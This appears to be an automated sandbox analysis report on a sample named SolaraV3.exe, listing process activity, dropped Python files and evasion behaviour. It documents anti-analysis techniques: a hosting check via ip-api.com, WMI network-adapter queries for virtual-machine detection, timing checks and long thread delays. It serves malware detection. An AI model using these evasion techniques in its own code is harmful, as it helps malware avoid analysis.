Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B815731 rdtsc

2_2_00007FFB0B815731

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8015	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1366	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7779
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6689
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5225
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 877
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4076

Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Evaded block: after key decision

graph_110-39798

Source: C:\Users\user\Desktop\SolaraV3.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_1-18324

Source: C:\Users\user\Desktop\SolaraV3.exe

API coverage: 4.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep count: 8015 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep count: 1366 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456	Thread sleep count: 7779 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256	Thread sleep count: 1625 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5944	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4908	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840	Thread sleep count: 6689 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840	Thread sleep count: 2824 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 1348 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056	Thread sleep count: 5447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep count: 1321 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6076	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 4059 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 201 > 30
